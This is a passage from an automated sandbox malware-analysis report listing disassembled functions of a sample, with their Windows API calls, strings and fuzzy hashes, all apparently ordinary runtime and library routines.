                                • Instruction Fuzzy Hash: A0F05562A8021436E320697A9C0BF63378C8FC1B20F14069BBE589B1C2D8E86D00C3E8
                                Function 003E8420 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32COMMON
                                Download Yara Rule
                                APIs
                                • ___std_exception_copy.LIBVCRUNTIME ref: 003E8453
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ___std_exception_copy
                                • String ID: 0q>$@ >
                                • API String ID: 2659868963-3763285519
                                • Opcode ID: 85afc7fe0f5afb3adac00c1918e4492c616389490010d3d39002be5345a2560f
                                • Instruction ID: 64673ceac7a804d7a160df5410aeb3033292a5e7d7cf5777b35964ab58de1c50
                                • Opcode Fuzzy Hash: 85afc7fe0f5afb3adac00c1918e4492c616389490010d3d39002be5345a2560f
                                • Instruction Fuzzy Hash: C4F09074E107089FC710DF69D84189AFBF8EF49300F50C6AFE85597300EBB4AA588B99
                                Function 003E6BD0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • ___std_exception_copy.LIBVCRUNTIME ref: 003E6C02
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ___std_exception_copy
                                • String ID: !7B$@ >
                                • API String ID: 2659868963-3301268938
                                • Opcode ID: ecfe851d1484a8688aeaebb8fdfb7efc282cb451faf8c9f408223e3f980c2c56
                                • Instruction ID: 2fe7e49d5b9a9b25b2c0f3e8065fb725355238da25f90f08629731fe561d3ff9
                                • Opcode Fuzzy Hash: ecfe851d1484a8688aeaebb8fdfb7efc282cb451faf8c9f408223e3f980c2c56
                                • Instruction Fuzzy Hash: 88F0A731E1020C9BC704DF68D8419CEBBF8AF45304F10C2AFE80167201EA755A548799
                                Function 003E72F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                Download Yara Rule
                                APIs
                                • ___std_exception_copy.LIBVCRUNTIME ref: 003E730F
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ___std_exception_copy
                                • String ID: 0q>$@ >
                                • API String ID: 2659868963-3763285519
                                • Opcode ID: 05d941ef53d462873975e1fa981d67e689de12c7a1a14ded9787310021d8f5f4
                                • Instruction ID: da10a28e3f21c782899f63defb19d8d5fde899da183c63407a36bc5460bd3c24
                                • Opcode Fuzzy Hash: 05d941ef53d462873975e1fa981d67e689de12c7a1a14ded9787310021d8f5f4
                                • Instruction Fuzzy Hash: DFE039B6A10709AB8300DF59D840882F7FCFE5A220341C62BEA2897B00E774B464CBA4
                                Function 003E85D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                Download Yara Rule
                                APIs
                                • ___std_exception_copy.LIBVCRUNTIME ref: 003E85EF
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ___std_exception_copy
                                • String ID: 0q>$@ >
                                • API String ID: 2659868963-3763285519
                                • Opcode ID: 5019d2892725dfb811bf9fd3d90e4747bbdd62d547bdadcc542366282c2ea6ff
                                • Instruction ID: c9b1122a1f35bd95282739bc2493be2eb6716243d9fa31891a444fee401fca84
                                • Opcode Fuzzy Hash: 5019d2892725dfb811bf9fd3d90e4747bbdd62d547bdadcc542366282c2ea6ff
                                • Instruction Fuzzy Hash: 89E0C9B6A10715AB8700DF59D841882F7FCFE59220355C62BE62997B00E774B5648BA4
                                Function 004269EB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 003EF030: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,?,00459524), ref: 003EF035
                                  • Part of subcall function 003EF030: GetLastError.KERNEL32(?,00000000,00000000,?,00459524), ref: 003EF03F
                                • IsDebuggerPresent.KERNEL32(?,?,?,003E1FC9), ref: 00426A1E
                                • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,003E1FC9), ref: 00426A2D
                                Strings
                                • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00426A28
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
                                • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                • API String ID: 3511171328-631824599
                                • Opcode ID: 65f33f26a6db08d99b2c6fe6bb1994bdc53e25431f4c44bc6679d25eff84ddc0
                                • Instruction ID: 883e57b26eabf31d68a45ce296dce20434e75f24fa0b86e3e4f431959c77e0b0
                                • Opcode Fuzzy Hash: 65f33f26a6db08d99b2c6fe6bb1994bdc53e25431f4c44bc6679d25eff84ddc0
                                • Instruction Fuzzy Hash: 66E06D742013608FE3319F69F504302BBE4AF05748F40892EE582D6250EBB8E5948BA5
                                Function 004205A0 Relevance: 5.3, APIs: 4, Instructions: 270COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: FreeLocal$ErrorLast
                                • String ID:
                                • API String ID: 4216857709-0
                                • Opcode ID: fa539d1f5cd324f904f95c12804c2b7d48a804ee4c81017b8535fd93bedec44f
                                • Instruction ID: 0d287ce7217dc1159d2a50744cc41786edbb1b1b40467c61cf42e74c9c36ee79
                                • Opcode Fuzzy Hash: fa539d1f5cd324f904f95c12804c2b7d48a804ee4c81017b8535fd93bedec44f
                                • Instruction Fuzzy Hash: 29B1AA70E003589FEB10DFA5D844BAEBBF0AF49304F54405EE805AB392DB79AD44CB99
                                Function 003E20F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON
                                Download Yara Rule
                                APIs
                                • ___std_exception_copy.LIBVCRUNTIME ref: 003E210E
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ___std_exception_copy
                                • String ID: @ >$@ >
                                • API String ID: 2659868963-3421840758
                                • Opcode ID: 45ab66b51f53d26006f39ee78bc52e79836726de6e1ff3c14cc9799c366a7585
                                • Instruction ID: 4456deb5c31d52426f7c40a86eef2a97722c946152a24af6b6488e42313a9da1
                                • Opcode Fuzzy Hash: 45ab66b51f53d26006f39ee78bc52e79836726de6e1ff3c14cc9799c366a7585
                                • Instruction Fuzzy Hash: 85D0C27292031457D2009F98EC00882B7EC9E16214341C62BF744E7200F774A49043A8
                                Function 003E8620 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON
                                Download Yara Rule
                                APIs
                                • ___std_exception_copy.LIBVCRUNTIME ref: 003E863E
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ___std_exception_copy
                                • String ID: @ >$@ >
                                • API String ID: 2659868963-3421840758
                                • Opcode ID: 8546db6b54f7b65daf4397cd024479c76794b616364b5fade9bb64b279734381
                                • Instruction ID: e36e2aa74de4d35524dde683f726677c6e3b9b714e9be7c69f7355190b312239
                                • Opcode Fuzzy Hash: 8546db6b54f7b65daf4397cd024479c76794b616364b5fade9bb64b279734381
                                • Instruction Fuzzy Hash: 41D0C27292031457C600DF98DC00882B7ECDE15654300C52BF244E7200F774E4908BA8
                                Function 00400AB0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON
                                Download Yara Rule
                                APIs
                                • ___std_exception_copy.LIBVCRUNTIME ref: 00400ACE
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ___std_exception_copy
                                • String ID: @ >$@ >
                                • API String ID: 2659868963-3421840758
                                • Opcode ID: 655726da94c4d8270a65e7ed0ab5ef38903b8572c309a74b62f89cd14c1bd5fb
                                • Instruction ID: 411f450d1d9332060aeab2ac8929895ccb771d65fef5f2377f051ae9d1907be2
                                • Opcode Fuzzy Hash: 655726da94c4d8270a65e7ed0ab5ef38903b8572c309a74b62f89cd14c1bd5fb
                                • Instruction Fuzzy Hash: 5BD0C7B2A203185BC600AF99EC40982B7EC9E1A354304C22BF244E7200F7B4E89087A8
                                Function 003E6E30 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON
                                Download Yara Rule
                                APIs
                                • ___std_exception_copy.LIBVCRUNTIME ref: 003E6E4E
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ___std_exception_copy
                                • String ID: @ >$@ >
                                • API String ID: 2659868963-3421840758
                                • Opcode ID: 88f7a87d2698ab7bcb35b391f0ee55fac310e15a4db82439607f70f1dd3a99ea
                                • Instruction ID: 44927ec5f728db342b9b739ebffb1759ac43ee2102e94046d342731ebefc64c9
                                • Opcode Fuzzy Hash: 88f7a87d2698ab7bcb35b391f0ee55fac310e15a4db82439607f70f1dd3a99ea
                                • Instruction Fuzzy Hash: A6D0C27292031457C2109F98DC00882B7ECDE16254340C52BF644E7200F774E8A047E8
                                Function 00408840 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNEL32(ntdll.dll), ref: 0040884B
                                • GetLastError.KERNEL32 ref: 00408855
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ErrorHandleLastModule
                                • String ID: ntdll.dll
                                • API String ID: 4242514867-2227199552
                                • Opcode ID: 36aba62ce95fc604c19e062d8ad298f6fc6990d57f78acf7fe0b79ec32909e4b
                                • Instruction ID: 063a34c65c2bcc900477c2604e5754f2802607d79655bad9e81b9a3e01d15dcc
                                • Opcode Fuzzy Hash: 36aba62ce95fc604c19e062d8ad298f6fc6990d57f78acf7fe0b79ec32909e4b
                                • Instruction Fuzzy Hash: FDD0A726B552080389103BB63C4B62533188602615F0407BDED5C913C1FD36843082CF
                                Function 0041FF30 Relevance: 5.3, APIs: 4, Instructions: 256COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: FreeLocal$ErrorLast
                                • String ID:
                                • API String ID: 4216857709-0
                                • Opcode ID: a11ec400a907a9f4136231dba04edd9796b3098bd08b2c25c50d051bd195dce6
                                • Instruction ID: 977ef9ae6c92403bda78f69477bcbb262c8bb68f59bbedeed1c7d49d5dd57e07
                                • Opcode Fuzzy Hash: a11ec400a907a9f4136231dba04edd9796b3098bd08b2c25c50d051bd195dce6
                                • Instruction Fuzzy Hash: E1B1CE70E00358CFEB14CFA4D844BAEBBF1AF05300F54405AE855AB392D779AD44CB59
                                Function 00420250 Relevance: 5.1, APIs: 4, Instructions: 93memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetLastError.KERNEL32 ref: 0042028E
                                • LocalAlloc.KERNEL32(00000000,00000000), ref: 004202BF
                                • GetLastError.KERNEL32 ref: 00420300
                                • LocalFree.KERNEL32(00000000), ref: 0042031B
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ErrorLastLocal$AllocFree
                                • String ID:
                                • API String ID: 1353762364-0
                                • Opcode ID: ffc37a13f114d6a482e4bca438f2c1c9ed3b9cf4aa91c70be571bcb0772160de
                                • Instruction ID: 1e0d0bf768c8be35cf022dc7155aca562c132499e7837adbd78c3d34f8d84f13
                                • Opcode Fuzzy Hash: ffc37a13f114d6a482e4bca438f2c1c9ed3b9cf4aa91c70be571bcb0772160de
                                • Instruction Fuzzy Hash: DB3193B5B05205ABD3108F5DEC49745FBE4FB55711F1082BAED04C3380E7B5A9248BE6
                                Function 003E56A0 Relevance: 5.1, APIs: 4, Instructions: 58COMMON
                                Download Yara Rule
                                APIs
                                • GetLastError.KERNEL32(00000000), ref: 003E56AA
                                • CloseHandle.KERNEL32 ref: 003E56B3
                                • SetLastError.KERNEL32(00000000), ref: 003E56BE
                                • CloseHandle.KERNEL32(00000000), ref: 003E56EA
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: CloseErrorHandleLast
                                • String ID:
                                • API String ID: 918212764-0
                                • Opcode ID: 5c66c753406c726f844e326796efb3558a63a51be74e6fdff268ad6f7e85b3a0
                                • Instruction ID: 29d8804e4844a0c26542ffa800dce87207aaa97b4baea3351110afd051f2d0ff
                                • Opcode Fuzzy Hash: 5c66c753406c726f844e326796efb3558a63a51be74e6fdff268ad6f7e85b3a0
                                • Instruction Fuzzy Hash: 52F0243120421897CB206F6EBC08A66339DAB86322B000228BE09C32D1DE30DD00C5B8